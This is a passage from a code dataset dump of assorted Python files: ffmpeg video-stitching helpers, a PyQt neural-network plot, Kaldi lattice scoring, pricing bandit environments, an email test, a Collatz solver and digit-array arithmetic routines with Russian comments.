logging.info('Converting from mp4 to avi...')\n run_external_command(\n '{} -i joined.mp4 -vcodec copy -r 29.97 -an joined.avi'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n\n\ndef mts_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from mts to mp4...')\n run_external_command(\n '{} -i {} -vcodec mpeg4 -b:v 15M -acodec libmp3lame -b:a 192k {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'),\n input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef avi_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from avi to mp4...')\n run_external_command(\n '{} -i {} -c:v libx264 -c:a copy {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef downsample(tmpdir, ffmpeg_path, input_file):\n logging.info('Downsampling...')\n run_external_command(\n '{} -i {} -threads 0 -r 29.97 -y output.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef check_fps(tmpdir, ffmpeg_path, inputfile):\n logging.info('Checking fps...')\n # the shell command\n command = '{} -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate {}'.format(\n os.path.join(ffmpeg_path, 'ffprobe'), inputfile)\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=None, shell=True, cwd=tmpdir)\n # Launch the shell command:\n output, error = process.communicate()\n return output.decode(\"utf-8\")\n\n\ndef run_external_command(command, tmpdir):\n subprocess.call(\n command,\n shell=True,\n cwd=tmpdir\n )\n\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.INFO)\n stitch_videos()\n","repo_name":"GlobalFinPrint/video_stitching","sub_path":"bulk_stitch.py","file_name":"bulk_stitch.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
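bulk_stitch.py joins the clips by writing an ffmpeg concat-demuxer list file and stream-copying it into one output. A standalone sketch of just that step; it assumes an ffmpeg binary on PATH, and the clip names in the commented call are hypothetical:

import os
import subprocess
import tempfile

def concat_clips(clip_paths, out_path, ffmpeg="ffmpeg"):
    # Write the concat demuxer list file: one "file '<path>'" line per clip.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        for clip in clip_paths:
            fh.write("file '{}'\n".format(os.path.abspath(clip)))
        list_file = fh.name
    try:
        # -c copy avoids re-encoding; -safe 0 allows absolute paths in the list file.
        subprocess.run([ffmpeg, "-f", "concat", "-safe", "0", "-i", list_file,
                        "-c", "copy", out_path], check=True)
    finally:
        os.remove(list_file)

# concat_clips(["clip_0001.mp4", "clip_0002.mp4"], "joined.mp4")  # hypothetical inputs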
+{"seq_id":"16920183580","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QDockWidget, QWidget, QGridLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_qt4agg\n\nclass MainWindow(QMainWindow):\n x = np.arange(1, 100, 0.001)\n delta = 1\n lim = 13\n A1 = np.random.rand(2,2)\n A2 = np.random.rand(2,2)\n b1 = np.array([0, 0])\n b2 = np.array([0, 0])\n\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.figure = plt.figure()\n self.drawing = self.figure.add_subplot(122)\n self.another = self.figure.add_subplot(121)\n self.canvas = matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg(self.figure)\n\n self.setCentralWidget(self.canvas)\n\n dock = QDockWidget(\"Values\")\n self.addDockWidget(Qt.RightDockWidgetArea, dock)\n\n sliders = QWidget()\n sliders_grid = QGridLayout(sliders)\n\n def add_slider(foo, col, row):\n sld = QSlider(Qt.Horizontal, sliders)\n sld.setMinimum(-10)\n sld.setMaximum(10)\n sld.setFocusPolicy(Qt.NoFocus)\n sld.valueChanged[int].connect(foo)\n sld.valueChanged.connect(self.plot)\n sliders_grid.addWidget(sld, row, col)\n\n add_slider(foo=self.a00, col=0, row=0)\n add_slider(foo=self.a01, col=0, row=1)\n add_slider(foo=self.a10, col=0, row=2)\n add_slider(foo=self.a11, col=0, row=3)\n add_slider(foo=self.c00, col=1, row=0)\n add_slider(foo=self.c01, col=1, row=1)\n add_slider(foo=self.c10, col=1, row=2)\n add_slider(foo=self.c11, col=1, row=3)\n add_slider(foo=self.b10, col=2, row=0)\n add_slider(foo=self.b11, col=2, row=1)\n add_slider(foo=self.b20, col=3, row=0)\n add_slider(foo=self.b21, col=3, row=1)\n \n\n dock.setWidget(sliders)\n\n self.plot()\n \n def a00(self, val):\n self.A1[0][0] = val\n\n def a01(self, val):\n self.A1[0][1] = val\n\n def a10(self, val):\n self.A1[1][0] = val\n\n def a11(self, val):\n self.A1[1][1] = val\n\n def c00(self, val):\n self.A2[0][0] = val\n\n def c01(self, val):\n self.A2[0][1] = val\n\n def c10(self, val):\n self.A2[1][0] = val\n\n def c11(self, val):\n self.A2[1][1] = val\n\n def b10(self, val):\n self.b1[0] = val \n\n def b11(self, val):\n self.b1[1] = val\n\n def b20(self, val):\n self.b2[0] = val\n\n def b21(self, val):\n self.b2[1] = val\n\n def sigm(self, x):\n return 1/(1+np.exp(-x))\n\n\n def neural_net(self, x, A1, A2, b1, b2, ind):\n def layer(x, A, b):\n return self.sigm(A.dot(x) + b)\n y1 = layer(x, A1, b1)\n y2 = layer(y1, A2, b2)\n return y2[ind]\n\n datx = np.arange(-13, 13, 1)\n daty = np.arange(-13, 13, 1)\n\n X, Y = np.meshgrid(np.arange(-13, 13, 1), np.arange(-13, 13, 1))\n\n #Z = X + Y\n def make_z(self, ind):\n Z = []\n for i in self.daty:\n ls = []\n for j in self.datx:\n ls.append(self.neural_net(np.array([j, i]), self.A1, self.A2, self.b1, self.b2, ind))\n Z.append(ls)\n return Z\n\n def plot(self):\n self.drawing.hold(False)\n self.another.contourf(self.X, self.Y, self.make_z(1))\n self.drawing.contourf(self.X, self.Y, self.make_z(0))\n self.drawing.set_ylim(-10, 10)\n self.canvas.draw()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"nzinci/Neural-networks-graphical-explaining","sub_path":"nnw.py","file_name":"nnw.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41705359292","text":"import os\n\nfrom utils.utils import run_shell\n\n\ndef score(data, words_path, dir,\n word_ins_penalty=None,\n min_acwt=1,\n max_acwt=20,\n acwt_factor=0.05 # the scaling factor for the acoustic scale. The scaling factor for acoustic likelihoods\n # needs to be 0.5 ~1.0. However, the job submission script can only take integers as the\n # job marker. That's why we set the acwt to be integers (5 ~ 10), but scale them with 0.1\n # when they are actually used.\n ):\n if word_ins_penalty is None:\n word_ins_penalty = [0.0, 0.5, 1.0, 1.5, 2.0]\n # decoing_scripts_folder = os.path.join(os.getcwd(), __name__.split(\".\")[0]) # 'kaldi_decoding_scripts'\n # pl_cmd_script = os.path.join(decoing_scripts_folder, \"utils/run.pl\")\n # assert os.path.exists(pl_cmd_script)\n # assert os.access(pl_cmd_script, os.X_OK)\n # symtab = os.path.join(lang_or_graph, \"words.txt\")\n # assert os.path.exists(symtab)\n # assert os.path.exists(os.path.join(dir, \"lat.1.gz\"))\n # assert os.path.exists(os.path.join(data, \"text\"))\n # int2sym_script = os.path.join(decoing_scripts_folder, \"utils/int2sym.pl\")\n # assert os.path.exists(int2sym_script)\n # assert os.access(int2sym_script, os.X_OK)\n # if not os.path.isdir(os.path.join(dir, \"scoring\", \"log\")):\n # os.makedirs(os.path.join(dir, \"scoring\", \"log\"))\n\n # --cmd \"$decode_cmd\" --nj 10 --beam 17.0 --lattice_beam 8.0 --max-active 5000 --acwt 0.9 \\\n # --skip true --splice true --splice-opts \"--left-context=1 --right-context=1\" --skip-frames 3 --skip-offset 1 \\\n # ${lang_dir}_test_${lm_suffix} $exp_base/$test $train_dir/decode_${test}_${lm_suffix} || exit 1;\n\n # words_path = \"wrds.txt\"\n\n if not os.path.exists(f\"{dir}/scoring\"):\n os.makedirs(f\"{dir}/scoring\")\n\n assert os.environ['EESEN_ROOT']\n lattice_scale_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-scale\"\n lattice_add_penalty_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-add-penalty\"\n lattice_best_path_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-best-path\"\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(\n # f\"{lattice_scale_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n # + f\"{lattice_add_penalty_bin} --word-ins-penalty={wip} ark:- ark:- |\"\n # + f\"{lattice_best_path_bin} --word-symbol-table={words_path} ark:- ark,t:{dir}/scoring/{ACWT}_{wip}_tra\")\n\n # run_shell(f\"cat {data}/text | sed 's:::g' | sed 's:::g' > {dir}/scoring/test_filt.txt\")\n run_shell(\n f\"cat {data}/text | sed 's:::g' | sed 's:::g' | sed 's:::g' > {dir}/scoring/text_filt\")\n\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n lattice_1best_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-1best\"\n nbest_to_ctm_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/nbest-to-ctm\"\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n\n int2sym_script = os.path.join(os.getcwd(), \"kaldi_decoding_scripts/utils/int2sym.pl\")\n assert os.path.exists(int2sym_script)\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(f\"cat {dir}/scoring/{ACWT}_{wip}_tra | {int2sym_script} -f 2- {words_path} | \"\n # + f\" sed 's:::g' | sed 's:::g' | sed 's:::g' |\"\n # + f\"{compute_wer_bin} --text --mode=present ark:{dir}/scoring/text_filt ark,p:- {dir}/details_{ACWT}_{wip} >& {dir}/wer_{ACWT}_{wip}\")\n\n convert_ctm_script = 
os.path.join(os.getcwd(), \"kws_decoder/eesen_utils/convert_ctm.pl\")\n assert os.path.exists(convert_ctm_script)\n name = \"test_name_\"\n # for wip in word_ins_penalty:\n for ACWT in range(min_acwt, max_acwt):\n if not os.path.exists(f\"{dir}/score_{ACWT}/\"):\n os.makedirs(f\"{dir}/score_{ACWT}/\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel \"\n + f\"> {dir}/score_{ACWT}/{name}.ctm\")\n","repo_name":"pfriesch/PhnKWS","sub_path":"kaldi_decoding_scripts/ctc_decoding/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
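The EESEN scoring script sweeps integer acoustic-weight markers from min_acwt to max_acwt and rescales them by acwt_factor to obtain the real acoustic scale (the comment in the record explains the integer job-marker constraint). A tiny sketch of how that (word-insertion-penalty, acoustic-scale) grid expands, with a hypothetical output layout modeled on the record:

import itertools

min_acwt, max_acwt, acwt_factor = 1, 20, 0.05
word_ins_penalty = [0.0, 0.5, 1.0, 1.5, 2.0]

# Each (penalty, marker) pair becomes one scoring pass; the integer marker is
# scaled down to the acoustic scale actually passed to lattice-scale.
for wip, acwt in itertools.product(word_ins_penalty, range(min_acwt, max_acwt)):
    effective_scale = acwt * acwt_factor
    tra_path = "scoring/{}_{}_tra".format(acwt, wip)   # hypothetical layout mirroring the record
    print(wip, acwt, round(effective_scale, 2), tra_path)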
+{"seq_id":"18397523414","text":"import itertools\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom gym import Env, spaces\n\nfrom bandits.bandits import BinomialBanditEnv\n\n\nclass PricingBernoulliBanditEnv(Env):\n def __init__(self, num_arms, dist, p_min=1, p_max=17, n_customers=100):\n super(PricingBernoulliBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.dist = dist # scipy dist\n self.p_min = p_min\n self.p_max = p_max\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n # normalize the prices to [0, 1]\n self.action_to_price = np.linspace(p_min, p_max, num_arms)\n self.mus = 1 - dist.cdf(self.action_to_price)\n self.b_bandit = BinomialBanditEnv(n=n_customers, probs=self.mus)\n\n self.max_reward = np.max(self.mus * self.action_to_price)\n\n def step(self, action):\n assert self.b_bandit.action_space.contains(action)\n\n observation, conversion_reward, done, info = self.b_bandit.step(action)\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n\ndef get_avocado_df(avocado_path):\n df = pd.read_csv(avocado_path)\n df = df.drop(columns=[\"Unnamed: 0\"])\n df[\"date\"] = df[\"Date\"].astype(\"datetime64[ns]\")\n df = df.sort_values(\"Date\")\n df = df[df[\"date\"] < \"2018-01-01\"]\n df = df[df[\"type\"] == \"conventional\"].reset_index(drop=True)\n\n df[\"price\"] = df[\"AveragePrice\"]\n df[\"quantity\"] = df[\"Total Volume\"]\n\n cols = [\"date\", \"price\", \"quantity\", \"region\"]\n df = df[cols].copy()\n\n aggregated_regions = [\n \"TotalUS\",\n \"West\",\n \"SouthCentral\",\n \"Northeast\",\n \"Southeast\",\n \"Midsouth\",\n \"Plains\",\n \"GreatLakes\",\n \"California\",\n ]\n df = df[~df.region.isin(aggregated_regions)]\n region_to_volume = df.groupby([\"region\"]).quantity.sum().sort_values(ascending=False).reset_index()\n good_regions = set(region_to_volume[:20].region) - set([\"LosAngeles\", \"NewYork\"])\n df = df[df.region.isin(good_regions)]\n return df\n\n\nclass PricingAvocadoBanditEnv(Env):\n def __init__(\n self,\n num_arms,\n avocado_df,\n region,\n start_date,\n model_path=\"../data/avocado_lgbm_model.txt\",\n T=10000,\n p_min=0.1,\n p_max=1,\n ):\n super(PricingAvocadoBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.start_date = start_date\n self.current_idx = 0\n self.region = region\n mm_prices = avocado_df[avocado_df.region == region].price.apply([\"min\", \"max\"])\n self.p_min_dataset = mm_prices[\"min\"]\n self.p_max_dataset = mm_prices[\"max\"]\n self.p_min_scale = p_min\n self.p_max_scale = p_max\n\n self.model = lgb.Booster(model_file=model_path)\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n self.action_to_price = np.linspace(self.p_min_scale, self.p_max_scale, num_arms)\n self.action_to_price_dataset = np.linspace(self.p_min_dataset, self.p_max_dataset, num_arms)\n\n self._prepare_predict_df(avocado_df, T)\n\n def step(self, action):\n assert self.action_space.contains(action)\n\n price = self.action_to_price_dataset[action]\n predict_df = self.price_to_predict_df[price]\n observation = 0\n conversion_reward = predict_df.iloc[self.current_idx, :][\"quantity_norm\"]\n # print(predict_df.iloc[self.current_idx, :])\n self.current_idx += 1\n done = False\n info = None\n price = self.action_to_price[action]\n reward = conversion_reward * price\n 
return observation, reward, done, info\n\n def reset(self):\n return 0\n\n def _prepare_predict_df(self, avocado_df, T):\n # Preparing the prediction dataframe from which the rewards will be drawn\n # basically, just predicting the grid of [prices, dates]\n\n def cols_to_categorical(df, categorical_columns):\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n def featurize(df):\n df[\"year-month\"] = df[\"date\"].dt.year * 100 + df[\"date\"].dt.month\n df[\"year\"] = df[\"date\"].dt.year\n df[\"month\"] = df[\"date\"].dt.month\n\n end_date = self.start_date + pd.Timedelta(T - 1, unit=\"D\")\n dates = pd.date_range(start=self.start_date, end=end_date)\n predict_df = pd.DataFrame(\n list(itertools.product(self.action_to_price_dataset, dates)),\n columns=[\"price\", \"date\"],\n )\n predict_df[\"region\"] = self.region\n featurize(predict_df)\n categorical_columns = [\"region\"]\n cols_to_categorical(predict_df, categorical_columns)\n model_cols = [\"price\", \"region\"]\n predict_df[\"quantity_without_noise\"] = self.model.predict(predict_df[model_cols])\n self.q_std = avocado_df[avocado_df.region == self.region].quantity.std()\n self.quantity_norm = avocado_df[avocado_df.region == self.region].quantity.max()\n e = np.random.normal(loc=0, scale=self.q_std, size=predict_df.shape[0]) / 5\n predict_df[\"quantity\"] = predict_df[\"quantity_without_noise\"] + e\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n means = predict_df.groupby(\"price\")[\"quantity_norm\"].mean().reset_index()\n means[\"mean_reward\"] = means[\"quantity_norm\"] * self.action_to_price\n self.max_reward = np.max(means[\"mean_reward\"])\n self.predict_df = predict_df\n\n # splitting the dataframe into slices based on prices\n # would speed up the self.step() significantly\n self.price_to_predict_df = {}\n for p in self.action_to_price_dataset:\n mask = np.isclose(self.predict_df[\"price\"], p)\n self.price_to_predict_df[p] = self.predict_df[mask]\n","repo_name":"thxi/hse_thesis","sub_path":"bandits/pricing/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
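In PricingBernoulliBanditEnv the expected reward of an arm is the price times the purchase probability 1 - F(price), so the optimal arm is an argmax over the price grid. A sketch of that computation under an assumed exponential willingness-to-pay distribution (the distribution and its scale are illustrative, not the ones used in the thesis code):

import numpy as np
from scipy import stats

p_min, p_max, num_arms = 1.0, 17.0, 20
prices = np.linspace(p_min, p_max, num_arms)

dist = stats.expon(scale=6.0)          # assumed willingness-to-pay distribution
buy_prob = 1.0 - dist.cdf(prices)      # P(customer accepts each posted price)
expected_reward = prices * buy_prob

best = int(np.argmax(expected_reward))
print(prices[best], expected_reward[best])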
+{"seq_id":"15623501358","text":"# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\n# Open a plain text file for reading. For this example, assume that\n# the text file contains only ASCII characters.\nmsg = MIMEText(\"This is an example email.\\nIt contains text.\")\n\n# me == the sender's email address\n# you == the recipient's email address\nmsg['Subject'] = 'Dart Battle Beta Test Signup Request'\nmsg['From'] = \"beta.test@dartbattle.fun\"\nmsg['To'] = \"beta.test@dartbattle.fun\"\n\n# Send the message via our own SMTP server, but don't include the\n# envelope header.\ns = smtplib.SMTP('localhost')\ns.sendmail(me, [you], msg.as_string())\ns.quit()\nprint(\"Success.\")","repo_name":"allenstetson/dartBattle","sub_path":"lambda/us-east-1_dartBattle/emailTest.py","file_name":"emailTest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"21848989793","text":"def collatz(n) :\n if n % 2 : \n return 3 * n + 1\n return n // 2 \n\ndic = {}\n\nfor i in range(2 , 1000001) : \n count = 1 ; num = i \n while num != 1 :\n count += 1 \n num = collatz(num)\n if num in dic : \n count += dic[num] - 1 \n num = 1 \n dic[i] = count \n\na = max(dic.values())\n\nfor k , v in dic.items() : \n if v == a :\n print(k)\n break ","repo_name":"PHNPR/Project-Euler-Problem-Solutions-in-Python","sub_path":"014.py","file_name":"014.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13178772875","text":"# Задача N-1(COM_NN_D): \"Сравнение натуральных чисел\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n\r\n# Алгоритм:\r\n# 1)Если длина первого больше длины второго, значит первое больше второго.\r\n# 2)Если длина второго больше длины первого, значит второе больше первого.\r\n# 3)Если длины одинаковы, проверяем каждый разряд числа пока не встретим различие: если цифра в рязряде первого числа больше цифры того же разряда второго числа,\r\n# то первое больше второго и наоборот.\r\n# 4)Если длины одинаковы и различий в разрядах нет, то числа равны.\r\n\r\n# Выходные данные:\r\n# 2 - если первое больше второго.\r\n# 1 - если второе больше первого.\r\n# 0 - если числа равны.\r\n\r\ndef COM_NN_D(n1, arr1, n2, arr2):\r\n if (n1 > n2):\r\n return 2\r\n elif (n1 < n2):\r\n return 1\r\n else:\r\n for i in range(0, n1):\r\n if (arr1[i] > arr2[i]):\r\n return 2\r\n elif (arr1[i] < arr2[i]):\r\n return 1\r\n return 0\r\n\r\n\r\n# Задача N-2(NZER_N_B): \"Проверка на ноль\"\r\n# Выполнил Волосевич А.Н. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число, представленных следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр A[..]\r\n\r\n# Алгоритм:\r\n# 1)Проверяем все цифры числа.\r\n# 2)Если хотя бы одна цифра не ноль, число не равно нулю.\r\n# 3)Иначе число равно нулю.\r\n\r\n# Выходные данные:\r\n# True - если число не 0\r\n# False - если число 0\r\n\r\ndef NZER_N_B(n: int, A: list) -> bool:\r\n for num in A:\r\n if num != 0:\r\n return True\r\n return False\r\n\r\n\r\n# Задача N-3(ADD_1N_N): \"Добавление 1 к натуральному числу\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход натуральное число, представленное следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр arr[..]\r\n\r\n# Алгоритм:\r\n# 1)Добавляем 1 к цифре младшего разряда. Если она равна 9, заменяем её на 0 и добавляем 1 к следующему разряду.\r\n# 2)Если программа таким образом дошла до старшего разряда, который равен 9, значит, у числа появится новый разряд.\r\n\r\n# Выходные данные:\r\n# Целое число n, массив arr[..]\r\n\r\ndef ADD_1N_N(n, arr):\r\n i = n - 1\r\n while i != -1:\r\n arr[i] += 1\r\n if arr[i] == 10:\r\n arr[i] = 0\r\n if i == 0:\r\n arr.insert(0, 1)\r\n n += 1\r\n i -= 1\r\n else:\r\n i = -1\r\n return [n, arr]\r\n\r\n\r\n# Задача N-4(ADD_NN_N): \"Сложение натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход A - массив чисел(натуральное число), n_a - количество цифр числа A, то же самое с B.\r\n\r\n# Алгоритм:\r\n# Получаем на вход массив чисел. Присваиваем переменным i и j индексы последнего элемента массива.\r\n# С помощью функции COM_NN_D сравниваем два числа. Если В больше А, только меняем их местами.(Для удобства работы)\r\n# Далее, начиная с последнего элемента начинаем прибавлять к элементу А элемент В.\r\n# Если число получается больше 10, то прибавляем к следующему элементу единицу, а само число A[i] делаем остатком.\r\n# (A[i] % 10). 
Если достигаем старшей цифры числа, а эта цифра оказывается больше или равна 10:\r\n# То с помощью insert добавляем в массив единицу\r\n\r\n# Выходные данные:\r\n# Возвращаем массив чисел A (получившаяся сумма) и количество цифр в массиве n_a.\r\n\r\ndef ADD_NN_N(n_a, A, n_b, B):\r\n if COM_NN_D(n_a, A, n_b, B) == 1:\r\n tmp = A\r\n A = B\r\n B = tmp\r\n tmp = n_a\r\n n_a = n_b\r\n n_b = tmp\r\n i = n_a - 1\r\n j = n_b - 1\r\n while (i >= 0):\r\n if j >= 0:\r\n A[i] += B[j]\r\n if A[i] >= 10:\r\n A[i] = A[i] % 10\r\n if i > 0:\r\n A[i - 1] += 1\r\n else:\r\n A.insert(0, 1)\r\n n_a += 1\r\n i -= 1\r\n j -= 1\r\n\r\n return [n_a, A]\r\n\r\n\r\n# Задача N-5(SUB_NN_N): \"Вычитание натуральных чисел\"\r\n# Выполнил Шаров А.К. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр a1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр a2[..]\r\n\r\n# Алгоритм:\r\n# Если числа равны, результат - 0.\r\n# Иначе, проверяем, что первое дейтвительно больше второго.\r\n# Далее, алгоритм вычитания в столбик:\r\n# - начиная с младшего разряда, вычитаем из первой цифры вторую\r\n# - если вторая цифра больше первой, занимаем 1 из следующего разряда\r\n# Результат вычитания записывается в отдельный массив res[..]\r\n\r\n# Выходные данные:\r\n# Длина массива res (номер старшей позиции), и сам массив res[..]\r\n\r\ndef SUB_NN_N(n1: int, a1: list, n2: int, a2: list) -> tuple:\r\n res = []\r\n eq = COM_NN_D(n1, a1, n2, a2)\r\n if eq == 0:\r\n res.append(0)\r\n elif eq == 2:\r\n for i in range(1, n1 + 1):\r\n while n1 > n2:\r\n a2 = [0] + a2\r\n n2 += 1\r\n if a1[-i] >= a2[-i]:\r\n res.append(a1[-i] - a2[-i])\r\n if res[-1] < 0: a1[-i + 1] += 1\r\n else:\r\n a1[-i - 1] -= 1\r\n res.append(a1[-i] - a2[-i] + 10)\r\n res.reverse()\r\n while res[0] == 0: res.pop(0)\r\n return len(res), res\r\n\r\n\r\n# Задача N-6(MUL_ND_N): \"Умножение натурального числа на цифру\"\r\n# Выполнил Катрущенко О.Д. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и цифру\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и цифра D\r\n\r\n# Алгоритм:\r\n# Начиная с младшего разряда, перемножаем разряд на цифру\r\n# - если в результате число из одного разряда, записываем его в массив для ответа\r\n# - если в результате ��исло из двух разядов, то записываем его младший разряд в массив для ответа,\r\n# а старший разряд записываем в вспомогательную переменную, чтобы добавить к результату следующего умножения\r\n\r\n# Выходные данные:\r\n# Целое число n, массив B[..]\r\n\r\ndef MUL_ND_N(n, A, D):\r\n ans = [0 for i in range(n)]\r\n r = 0\r\n for i in range(n - 1, -1, -1):\r\n ans[i] = A[i] * D + r\r\n if ans[i] >= 10:\r\n r = ans[i] // 10\r\n ans[i] = ans[i] % 10\r\n if r != 0:\r\n ans.insert(0, r)\r\n n += 1\r\n return [n, ans]\r\n\r\n\r\n# Задача N-7(MUL_Nk_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и коэффициент\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и коэффициент k\r\n\r\n# Алгоритм:\r\n# заполняем элементы списка нулями, начиная с n-ного элемента и заканчивая n+k\r\n# т.к. 
итоговое число будет содержать в себе n+k элементов\r\n# увеличиваем счётчик кол-ва цифр\r\n# имеем число n и список a_t, содержащий в себе число, умноженное на 10^k и разбитое на цифры\r\n\r\n# Выходные данные:\r\n# Целое число n, массив a_t[..]\r\n\r\ndef MUL_Nk_N(n, A, k):\r\n a_t = A.copy()\r\n for i in range(n, n + k):\r\n a_t.insert(i, 0)\r\n n += k\r\n return n, a_t\r\n\r\n\r\n# Задача N-8(MUL_NN_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр B[..]\r\n\r\n# Алгоритм:\r\n# если первое число меньше второго - меняем их местами (для удобства работы)\r\n# перемножаем первое число поочерёдно с каждой цифрой из второго числа, начиная с младших разрядов\r\n# сдвигаем разряд произведения, умножив полученное слагаемое на 10^k\r\n# складываем полученные результаты произведений (сумма накапливается в массиве mul0)\r\n# увеличиваем сдвиг (переменная k) на 1\r\n\r\n# Выходные данные:\r\n# Целое число c2, массив mul0[..]\r\n\r\ndef MUL_NN_N(n1, A, n2, B):\r\n mul0 = []\r\n k = 0\r\n\r\n if A == [0] or B == [0]:\r\n c2 = 1\r\n mul0.insert(0, 0)\r\n else:\r\n\r\n if COM_NN_D(n1, A, n2, B) == 1:\r\n A, B = B, A\r\n temp = n1\r\n n1 = n2\r\n n2 = temp\r\n\r\n for i in range(len(B) - 1, -1, -1):\r\n c, L = MUL_ND_N(len(A), A, B[i])\r\n A.reverse()\r\n\r\n c1, L = MUL_Nk_N(c, L, k)\r\n\r\n c2, mul0 = ADD_NN_N(len(mul0), mul0, c1, L)\r\n\r\n k = k + 1\r\n return [c2, mul0]\r\n\r\n\r\n# Задача N-9(SUB_NDN_N): \"Вычитание из натурального другого натурального, умноженного на цифру для случая с неотрицательным результатом\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр 